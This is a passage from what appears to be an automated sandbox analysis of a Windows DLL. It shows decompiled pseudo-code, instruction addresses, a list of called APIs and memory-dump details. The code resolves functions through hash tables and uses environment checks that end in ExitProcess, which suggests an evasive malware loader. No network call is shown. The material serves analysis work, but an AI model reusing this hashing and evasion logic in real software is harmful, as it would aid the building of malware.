    										_v812 = E6ECA7E20;
    										_v808 =  &M6ECB05C0;
    										_v804 = 0;
    										_v800 = 0xd576e7bf;
    										_v796 = E6ECA7E50;
    										_v792 =  &M6ECB05C4;
    										_v788 = 0;
    										_v784 = 0x4bdf2df3;
    										_v780 = E6ECA7EC0;
    										_v776 =  &M6ECB05B8;
    										_v772 = 0;
    										_v768 = 0x25955ea4;
    										_v764 = E6ECA7EE0;
    										_v760 =  &M6ECB05E0;
    										_v756 = 0;
    										_v752 = 0x576e0706;
    										_v748 = E6ECA7E00;
    										_v744 =  &M6ECB05B0;
    										_v740 = 0;
    										_v736 = 0xa3bab257;
    										_v732 = E6ECA7E00;
    										_v728 =  &M6ECB05B4;
    										_v724 = 0;
    										_v720 = 0xeb950520;
    										_v716 = E6ECA7EF0;
    										_v712 =  &M6ECB05E4;
    										_v708 = 0;
    										_v704 = 0x983d21d0;
    										_v700 = E6ECA7E90;
    										_v696 =  &M6ECB05C8;
    										_v692 = 0;
    										_v688 = 0xbd4f6953;
    										_v684 = E6ECA7EA0;
    										_v680 =  &M6ECB05CC;
    										_v676 = 0;
    										_v672 = 0xc1059600;
    										_v668 = E6ECA7EF0;
    										_v664 =  &M6ECB05BC;
    										_v660 = 0;
    										_v656 = 0x92d6cfa1;
    										_v652 = E6ECA7EB0;
    										_v648 =  &M6ECB05D0;
    										_v644 = 0;
    										_v640 = 0xa710b547;
    										_v636 = E6ECA7EF0;
    										_v632 =  &M6ECB05D4;
    										_v628 = 0;
    										_v624 = 0x35fe64ad;
    										_v620 = E6ECA7DB0;
    										_v616 =  &M6ECB05A8;
    										_v612 = 0;
    										_v608 = 0x508fafbc;
    										_v604 = E6ECA7DE0;
    										_v600 =  &M6ECB05AC;
    										_v596 = 0;
    										E6ECA1FA0(_t425,  &_v864, 0x11, _t582 + 0x435a88);
    										_t559 = M6ECB0578; // 0x0
    										_v984 =  *((char*)(_t559 + 9));
    										_t456 = M6ECB0568; // 0x0
    										_t614 = _t614 + 0x10;
    										_v982 =  *(_t456 + 0x1e) & 0x0000ffff;
    										_t457 = M6ECB0574; // 0x0
    										_v980 =  *(_t456 + 0x1e) & 0x0000ffff;
    										_v978 =  *((char*)(_t457 + 1));
    										_v974 = 0x62;
    										_v976 =  *_t457;
    										_push(0);
    										_push( &_v984);
    										_v972 =  *((char*)(_t457 + 3));
    										_v970 = 0;
    										M6ECB05A8();
    										_push(0);
    										_t459 =  &_v992;
    										_push(_t459);
    										_v980 = 0;
    										M6ECB05A8();
    										_t582 = 0 + _t459;
    										_v1008 = _t582;
    									}
    									_t426 = E6ECA1D50(0x770adc, _t592);
    									_t506 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									wsprintfA( &_v592, "%s%s", _t506, _t426);
    									_t615 = _t614 + 0x18;
    									_t428 =  &_v584;
    									_push(_t428);
    									M6ECB058C();
    									M6ECB0494 = _t428;
    									if(_t428 != 0) {
    										_t208 = _t582 + 0x435a88; // 0x435a88
    										_v980 = 0x1febfb51;
    										_v976 = E6ECA7ED0;
    										_v972 =  &M6ECB05DC;
    										_v968 = 0;
    										_v964 = 0xa4bc5079;
    										_v960 = E6ECA7EC0;
    										_v956 =  &M6ECB05D8;
    										_v952 = 0;
    										_v948 = 0x3fca0603;
    										_v944 = E6ECA83A0;
    										_v940 =  &M6ECB0608;
    										_v936 = 0;
    										_v932 = 0x5fa6686b;
    										_v928 = E6ECA83D0;
    										_v924 =  &M6ECB060C;
    										_v920 = 0;
    										E6ECA1FA0(_t428,  &_v980, 4, _t208);
    										_t615 = _t615 + 0x10;
    									}
    									_t429 = E6ECA1D50(0x7715e4, _t592);
    									_t430 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									_t431 = wsprintfA( &_v588, "%s%s", _t430, _t429);
    									_t616 = _t615 + 0x18;
    									_push( &_v580);
    									M6ECB058C();
    									M6ECB0498 = _t431;
    									if(_t431 != 0) {
    										_t228 = _t582 + 0x435a88; // 0x435a88
    										_v976 = 0xa0428c41;
    										_v972 = E6ECA7B70;
    										_v968 =  &M6ECB0598;
    										_v964 = 0;
    										_v960 = 0x35ad950a;
    										_v956 = E6ECA7BD0;
    										_v952 =  &M6ECB059C;
    										_v948 = 0;
    										E6ECA1FA0(_t431,  &_v976, 2, _t228);
    										_t616 = _t616 + 0x10;
    									}
    									_t432 = E6ECA1D50(0x350b4, _t592);
    									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									_t434 = wsprintfA( &_v584, "%s%s", _t433, _t432);
    									_t617 = _t616 + 0x18;
    									_push( &_v576);
    									M6ECB058C();
    									M6ECB049C = _t434;
    									if(_t434 != 0) {
    										_v972 = 0x32e7e368;
    										_v968 = E6ECA82F0;
    										_v964 =  &M6ECB0600;
    										_v960 = 0;
    										E6ECA1FA0(_t434,  &_v972, 1, _t582 + 0x435a88);
    										_t617 = _t617 + 0x10;
    									}
    									_t436 = E6ECAA2F0(E6ECA1D50(0x77cf0c, _t592), 0, 0);
    									_t551 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									_t583 = _t436;
    									wsprintfA( &_v580, "%s%s", _t551, _t583);
    									_t618 = _t617 + 0x24;
    									_t440 = HeapFree(GetProcessHeap(), 0, _t583);
    									_push( &_v572);
    									M6ECB058C();
    									M6ECB04A0 = _t440;
    									if(_t440 != 0) {
    										_v968 = 0xa4a1b443;
    										_v964 = E6ECA7EE0;
    										_v960 =  &M6ECB05F4;
    										_v956 = 0;
    										E6ECA1FA0(_t440,  &_v968, 1, _v976 + 0x435a88);
    										_t618 = _t618 + 0x10;
    									}
    									_t441 = E6ECA1D50(0x37b4c, _t592);
    									_t552 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									_t443 = wsprintfA( &_v576, "%s%s", _t552, _t441);
    									_t619 = _t618 + 0x18;
    									_push( &_v568);
    									M6ECB058C();
    									M6ECB04A4 = _t443;
    									if(_t443 != 0) {
    										_v964 = 0x468fa9db;
    										_v960 = E6ECA8370;
    										_v956 =  &M6ECB0604;
    										_v952 = 0;
    										E6ECA1FA0(_t443,  &_v964, 1, _v972 + 0x435a88);
    										_t619 = _t619 + 0x10;
    									}
    									_t444 = E6ECA31F0(0xffffffff);
    									_push(0xa);
    									_push(0x10);
    									_push(L"15.0.");
    									M6ECB04EC = _t444;
    									_push(E6ECA1D50(0x1f3ac, _t592));
    									E6ECA8400();
    									if(E6ECAB820(0) != 0) {
    										ExitProcess(0);
    									}
    									M6ECB0614 = 2;
    									return 1;
    								} else {
    									goto L131;
    								}
    							}
    						}
    					}
    				}
    			}
    0x6eca851e
    0x6eca8522
    0x6eca94d7
    0x6eca94e8
    0x6eca94ea
    0x6eca94f1
    0x6eca94f1
    0x6eca94f3
    0x6eca94f8
    0x6eca94fa
    0x6eca9501
    0x6eca9501
    0x6eca9503
    0x6eca9508
    0x6eca950a
    0x6eca9511
    0x6eca9511
    0x6eca9513
    0x6eca9518
    0x6eca951a
    0x6eca9521
    0x6eca9521
    0x6eca9523
    0x6eca9528
    0x6eca952a
    0x6eca9531
    0x6eca9531
    0x6eca9533
    0x6eca9538
    0x6eca953a
    0x6eca9541
    0x6eca9541
    0x6eca9543
    0x6eca9548
    0x6eca954a
    0x6eca9551
    0x6eca9551
    0x6eca9553
    0x6eca9558
    0x6eca955a
    0x6eca9561
    0x6eca9561
    0x6eca9563
    0x6eca9568
    0x6eca956a
    0x6eca9571
    0x6eca9571
    0x6eca9573
    0x6eca9578
    0x6eca957a
    0x6eca9581
    0x6eca9581
    0x6eca9583
    0x6eca9588
    0x6eca958a
    0x6eca9591
    0x6eca9591
    0x6eca9593
    0x6eca9598
    0x6eca959a
    0x6eca95a1
    0x6eca95a1
    0x6eca95a3
    0x6eca95a8
    0x6eca95aa
    0x6eca95b1
    0x6eca95b1
    0x6eca95b3
    0x6eca95b9
    0x6eca95bf
    0x6eca95ca
    0x6eca95cc
    0x6eca95cf
    0x6eca95cf
    0x6eca95d1
    0x6eca95d6
    0x6eca95d8
    0x6eca95db
    0x6eca95db
    0x6eca95dd
    0x6eca95e2
    0x6eca95e4
    0x6eca95e7
    0x6eca95e7
    0x6eca95e9
    0x6eca95ee
    0x6eca95f0
    0x6eca95f3
    0x6eca95f3
    0x6eca95f5
    0x6eca95fa
    0x6eca95fc
    0x6eca95ff
    0x6eca95ff
    0x6eca9601
    0x6eca9606
    0x6eca9608
    0x6eca960b
    0x6eca960b
    0x6eca960d
    0x6eca9612
    0x6eca9614
    0x6eca9617
    0x6eca9617
    0x6eca9619
    0x6eca961e
    0x6eca9620
    0x6eca9627
    0x6eca9627
    0x6eca9629
    0x6eca962e
    0x6eca9630
    0x6eca9637
    0x6eca9637
    0x6eca9639
    0x6eca963e
    0x6eca9640
    0x6eca9647
    0x6eca9647
    0x6eca9649
    0x6eca964e
    0x6eca9650
    0x6eca9657
    0x6eca9657
    0x6eca9659
    0x6eca965e
    0x6eca9660
    0x6eca9663
    0x6eca9663
    0x6eca9669
    0x6eca9670
    0x6eca9673
    0x6eca9673
    0x6eca9678
    0x6eca967e
    0x6eca9680
    0x6eca9680
    0x6eca968b
    0x6eca9690
    0x6eca9690
    0x6eca9692
    0x6eca9694
    0x6eca9697
    0x6eca9697
    0x6eca9699
    0x6eca969c
    0x6eca969c
    0x6eca96a4
    0x6eca96a9
    0x6eca96ab
    0x6eca96af
    0x6eca96b4
    0x6eca96bb
    0x6eca96bb
    0x6eca96ab
    0x00000000
    0x6eca8528
    0x6eca8529
    0x6eca96c0
    0x6eca96cc
    0x6eca852f
    0x6eca8537
    0x6eca8551
    0x6eca8556
    0x6eca8563
    0x6eca856b
    0x6eca8578
    0x6eca857b
    0x6eca857b
    0x6eca8581
    0x6eca858e
    0x6eca859a
    0x6eca85aa
    0x6eca85bc
    0x6eca85c4
    0x6eca85c6
    0x6eca85d5
    0x6eca85da
    0x6eca85df
    0x6eca85f6
    0x6eca85fb
    0x6eca8608
    0x6eca8610
    0x6eca861f
    0x6eca8624
    0x6eca8632
    0x6eca8637
    0x6eca863f
    0x6eca864d
    0x6eca8669
    0x6eca8671
    0x6eca8679
    0x6eca8680
    0x6eca8684
    0x6eca8690
    0x6eca869b
    0x6eca86a0
    0x6eca86a3
    0x6eca86a3
    0x6eca86c8
    0x6eca86d0
    0x6eca86d4
    0x6eca86da
    0x6eca86e5
    0x6eca86ea
    0x6eca870f
    0x6eca8716
    0x6eca871b
    0x6eca8721
    0x6eca8731
    0x6eca8752
    0x6eca875d
    0x6eca8768
    0x6eca8772
    0x6eca8779
    0x6eca877e
    0x6eca8784
    0x6eca8794
    0x00000000
    0x6eca8796
    0x6eca8797
    0x6eca8797
    0x6eca8794
    0x6eca8731
    0x6eca86ea
    0x6eca879d
    0x6eca87a7
    0x6eca87b0
    0x6eca87b5
    0x6eca87bb
    0x6eca87c2
    0x6eca87ce
    0x6eca87d3
    0x6eca87da
    0x6eca87ec
    0x6eca87f1
    0x6eca87fb
    0x6eca8805
    0x6eca8811
    0x6eca8816
    0x6eca881b
    0x6eca881e
    0x6eca8823
    0x6eca8829
    0x6eca882e
    0x6eca883b
    0x00000000
    0x6eca8841
    0x6eca8844
    0x6eca884c
    0x00000000
    0x6eca8852
    0x6eca885f
    0x6eca8866
    0x6eca886a
    0x6eca8878
    0x6eca887a
    0x6eca8881
    0x6eca888c
    0x6eca8894
    0x6eca8896
    0x6eca889d
    0x6eca889d
    0x6eca8894
    0x6eca88a7
    0x6eca88b5
    0x6eca88b7
    0x6eca88be
    0x6eca88cb
    0x6eca88d3
    0x6eca88d8
    0x6eca88dc
    0x6eca88df
    0x6eca88df
    0x6eca88d8
    0x6eca88e4
    0x6eca88ec
    0x6eca88f6
    0x6eca88fb
    0x6eca8900
    0x6eca8900
    0x6eca8905
    0x6eca890a
    0x6eca890f
    0x6eca8912
    0x6eca8912
    0x6eca8921
    0x6eca8923
    0x6eca892a
    0x6eca8943
    0x6eca8949
    0x6eca8952
    0x6eca8957
    0x6eca895a
    0x6eca895a
    0x6eca896a
    0x6eca897a
    0x6eca897f
    0x6eca8994
    0x6eca8999
    0x6eca89a4
    0x6eca89a9
    0x6eca89b9
    0x6eca89c9
    0x6eca89d9
    0x6eca89e9
    0x6eca89f9
    0x6eca8a09
    0x6eca8a1c
    0x6eca8a2c
    0x6eca8a3c
    0x6eca8a4c
    0x6eca8a5c
    0x6eca8a6c
    0x6eca8a7c
    0x6eca8a89
    0x6eca8a92
    0x6eca8aa3
    0x6eca8ab3
    0x6eca8acb
    0x6eca8ae3
    0x6eca8af3
    0x6eca8b0b
    0x6eca8b10
    0x6eca8b16
    0x6eca8b1c
    0x6eca8b28
    0x6eca8b2a
    0x6eca8b2f
    0x6eca8b39
    0x6eca8b3f
    0x6eca8b46
    0x6eca8b48
    0x6eca8b50
    0x6eca8b55
    0x6eca8b7c
    0x6eca8b7c
    0x6eca8b80
    0x6eca8b82
    0x6eca8b85
    0x6eca8b98
    0x6eca8b98
    0x6eca8b9b
    0x6eca8b9d
    0x6eca8ba0
    0x6eca8ba2
    0x6eca8ba2
    0x6eca8ba0
    0x6eca8b87
    0x6eca8b87
    0x6eca8b8a
    0x00000000
    0x6eca8b8c
    0x6eca8b8c
    0x6eca8b8c
    0x6eca8b8a
    0x6eca8b57
    0x6eca8b57
    0x6eca8b5e
    0x00000000
    0x6eca8b65
    0x6eca8b65
    0x6eca8b69
    0x6eca8b6b
    0x6eca8b71
    0x6eca8b75
    0x6eca8b75
    0x6eca8b5e
    0x6eca8bac
    0x6eca8bad
    0x6eca8b50
    0x6eca8bb2
    0x6eca8bb2
    0x6eca8bb8
    0x6eca8bba
    0x6eca8bbf
    0x6eca8bcd
    0x6eca8bd2
    0x6eca8bd7
    0x6eca8bdd
    0x6eca8be6
    0x6eca8bf4
    0x6eca8c01
    0x6eca8c08
    0x6eca8c0c
    0x6eca8c12
    0x6eca8c1c
    0x6eca8c22
    0x6eca8c2f
    0x6eca8c3c
    0x6eca8c4a
    0x6eca8c4c
    0x6eca8c51
    0x6eca8c53
    0x6eca8c59
    0x6eca8c5a
    0x6eca8c5b
    0x6eca8c63
    0x6eca8c67
    0x6eca8c6b
    0x6eca8c6f
    0x6eca8c74
    0x6eca8c78
    0x6eca8c7d
    0x6eca8c7f
    0x6eca8c7f
    0x6eca8c92
    0x6eca8c97
    0x6eca8c9d
    0x6eca8cae
    0x6eca8cb4
    0x6eca8cc0
    0x6eca8cc6
    0x6eca8ccd
    0x6eca8cce
    0x6eca8cd4
    0x6eca8ce0
    0x6eca8ce3
    0x6eca8ce3
    0x6eca8cee
    0x6eca8cf6
    0x6eca8cf7
    0x6eca8d01
    0x6eca8d19
    0x6eca8d20
    0x6eca8d2e
    0x6eca8d4e
    0x6eca8d43
    0x6eca8d43
    0x6eca8d48
    0x6eca8d48
    0x6eca8d52
    0x6eca8d58
    0x6eca8d5d
    0x6eca8d63
    0x6eca8d64
    0x6eca8d65
    0x6eca8d6d
    0x6eca8d71
    0x6eca8d75
    0x6eca8d79
    0x6eca8d7e
    0x6eca8d82
    0x6eca8d87
    0x6eca8d89
    0x6eca8d89
    0x6eca8d8e
    0x6eca8d9d
    0x6eca8da5
    0x6eca8dad
    0x6eca8db5
    0x6eca8db9
    0x6eca8dc1
    0x6eca8dc9
    0x6eca8dd1
    0x6eca8dd5
    0x6eca8ddd
    0x6eca8de5
    0x6eca8ded
    0x6eca8df1
    0x6eca8df9
    0x6eca8e01
    0x6eca8e09
    0x6eca8e0d
    0x6eca8e15
    0x6eca8e1d
    0x6eca8e25
    0x6eca8e29
    0x6eca8e2e
    0x6eca8e2e
    0x6eca8e37
    0x6eca8e3c
    0x6eca8e57
    0x6eca8e59
    0x6eca8e5c
    0x6eca8e63
    0x6eca8e64
    0x6eca8e6a
    0x6eca8e71
    0x6eca8e89
    0x6eca8e94
    0x6eca8e9f
    0x6eca8eaa
    0x6eca8eb1
    0x6eca8ebc
    0x6eca8ec7
    0x6eca8ed2
    0x6eca8ed9
    0x6eca8ee4
    0x6eca8eef
    0x6eca8efa
    0x6eca8f01
    0x6eca8f0c
    0x6eca8f17
    0x6eca8f22
    0x6eca8f29
    0x6eca8f34
    0x6eca8f3f
    0x6eca8f4a
    0x6eca8f51
    0x6eca8f5c
    0x6eca8f67
    0x6eca8f72
    0x6eca8f79
    0x6eca8f84
    0x6eca8f8f
    0x6eca8f9a
    0x6eca8fa1
    0x6eca8fac
    0x6eca8fb7
    0x6eca8fc2
    0x6eca8fc9
    0x6eca8fd4
    0x6eca8fdf
    0x6eca8fea
    0x6eca8ff1
    0x6eca8ffc
    0x6eca9007
    0x6eca9012
    0x6eca9019
    0x6eca9024
    0x6eca902f
    0x6eca903a
    0x6eca9041
    0x6eca904c
    0x6eca9057
    0x6eca9062
    0x6eca9069
    0x6eca9074
    0x6eca907f
    0x6eca908a
    0x6eca9091
    0x6eca909c
    0x6eca90a7
    0x6eca90b2
    0x6eca90b9
    0x6eca90c4
    0x6eca90cf
    0x6eca90da
    0x6eca90e1
    0x6eca90ec
    0x6eca90f7
    0x6eca9102
    0x6eca9109
    0x6eca9114
    0x6eca911f
    0x6eca912a
    0x6eca9131
    0x6eca9136
    0x6eca9141
    0x6eca9146
    0x6eca914f
    0x6eca9152
    0x6eca915b
    0x6eca9160
    0x6eca9169
    0x6eca9176
    0x6eca917b
    0x6eca9184
    0x6eca918b
    0x6eca918c
    0x6eca9191
    0x6eca9196
    0x6eca919e
    0x6eca919f
    0x6eca91a5
    0x6eca91a6
    0x6eca91ab
    0x6eca91b1
    0x6eca91b3
    0x6eca91b3
    0x6eca91bd
    0x6eca91c2
    0x6eca91d7
    0x6eca91d9
    0x6eca91dc
    0x6eca91e3
    0x6eca91e4
    0x6eca91ea
    0x6eca91f1
    0x6eca91f7
    0x6eca9206
    0x6eca920e
    0x6eca9216
    0x6eca921e
    0x6eca9222
    0x6eca922a
    0x6eca9232
    0x6eca923a
    0x6eca923e
    0x6eca9246
    0x6eca924e
    0x6eca9256
    0x6eca925a
    0x6eca9262
    0x6eca926a
    0x6eca9272
    0x6eca9276
    0x6eca927b
    0x6eca927b
    0x6eca9284
    0x6eca928a
    0x6eca929d
    0x6eca929f
    0x6eca92a9
    0x6eca92aa
    0x6eca92b0
    0x6eca92b7
    0x6eca92b9
    0x6eca92c8
    0x6eca92d0
    0x6eca92d8
    0x6eca92e0
    0x6eca92e4
    0x6eca92ec
    0x6eca92f4
    0x6eca92fc
    0x6eca9300
    0x6eca9305
    0x6eca9305
    0x6eca930e
    0x6eca9314
    0x6eca9327
    0x6eca9329
    0x6eca9333
    0x6eca9334
    0x6eca933a
    0x6eca9341
    0x6eca9352
    0x6eca935a
    0x6eca9362
    0x6eca936a
    0x6eca936e
    0x6eca9373
    0x6eca9373
    0x6eca9384
    0x6eca9389
    0x6eca9395
    0x6eca93a6
    0x6eca93a8
    0x6eca93b4
    0x6eca93c1
    0x6eca93c2
    0x6eca93c8
    0x6eca93cf
    0x6eca93e4
    0x6eca93ec
    0x6eca93f4
    0x6eca93fc
    0x6eca9400
    0x6eca9405
    0x6eca9405
    0x6eca940e
    0x6eca9413
    0x6eca9428
    0x6eca942a
    0x6eca9434
    0x6eca9435
    0x6eca943b
    0x6eca9442
    0x6eca9457
    0x6eca945f
    0x6eca9467
    0x6eca946f
    0x6eca9473
    0x6eca9478
    0x6eca9478
    0x6eca947d
    0x6eca9485
    0x6eca9487
    0x6eca9489
    0x6eca9494
    0x6eca94a1
    0x6eca94a2
    0x6eca94b2
    0x6eca94b5
    0x6eca94b5
    0x6eca94be
    0x6eca94d4
    0x00000000
    0x00000000
    0x00000000
    0x6eca896a
    0x6eca884c
    0x6eca883b
    0x6eca8529

    APIs
    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6ECA8537
    • GetModuleHandleA.KERNEL32(00000000), ref: 6ECA853E
    • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA855A
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA8563
    • GetSystemDirectoryA.KERNEL32 ref: 6ECA8570
    • ExitProcess.KERNEL32 ref: 6ECA857B
    • PathAddBackslashA.KERNELBASE(00CD1A50), ref: 6ECA858E
    • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA8597
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA859A
    • GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6ECA85AF
    • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA85C1
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA85C4
    • RtlMoveMemory.NTDLL(00000000,00CD1B60,00000021), ref: 6ECA85DA
    • PathRemoveFileSpecA.SHLWAPI(00CD1B60), ref: 6ECA85FB
    • PathAddBackslashA.SHLWAPI(00CD1B60), ref: 6ECA8608
    • SetCurrentDirectoryA.KERNELBASE(00CD1B60), ref: 6ECA8610
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6ECA8637
    • PathAddBackslashA.SHLWAPI(?), ref: 6ECA864D
    • wsprintfA.USER32 ref: 6ECA8684
    • GetFileAttributesA.KERNELBASE(?,?,%s%s,?,?), ref: 6ECA869B
    • ExitProcess.KERNEL32 ref: 6ECA86A3
    • GetProcessHeap.KERNEL32(00000000,00CD1A50), ref: 6ECA94EE
    • HeapFree.KERNEL32(00000000), ref: 6ECA94F1
    • GetProcessHeap.KERNEL32(00000000,00CD1B60), ref: 6ECA94FE
    • HeapFree.KERNEL32(00000000), ref: 6ECA9501
    • GetProcessHeap.KERNEL32(00000000,00CBFF88), ref: 6ECA950E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9511
    • GetProcessHeap.KERNEL32(00000000,00CD1C70), ref: 6ECA951E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9521
    • GetProcessHeap.KERNEL32(00000000,00CC27F0), ref: 6ECA952E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9531
    • GetProcessHeap.KERNEL32(00000000,00CB2C98), ref: 6ECA953E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9541
    • GetProcessHeap.KERNEL32(00000000,00CC2700), ref: 6ECA954E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9551
    • GetProcessHeap.KERNEL32(00000000,00CD21B8), ref: 6ECA955E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9561
    • GetProcessHeap.KERNEL32(00000000,00CD3FB0), ref: 6ECA956E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9571
    • GetProcessHeap.KERNEL32(00000000,00CBE878), ref: 6ECA957E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9581
    • GetProcessHeap.KERNEL32(00000000,00CC63C8), ref: 6ECA958E
    • HeapFree.KERNEL32(00000000), ref: 6ECA9591
    • GetProcessHeap.KERNEL32(00000000,00CB2DA8), ref: 6ECA959E
    • HeapFree.KERNEL32(00000000), ref: 6ECA95A1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
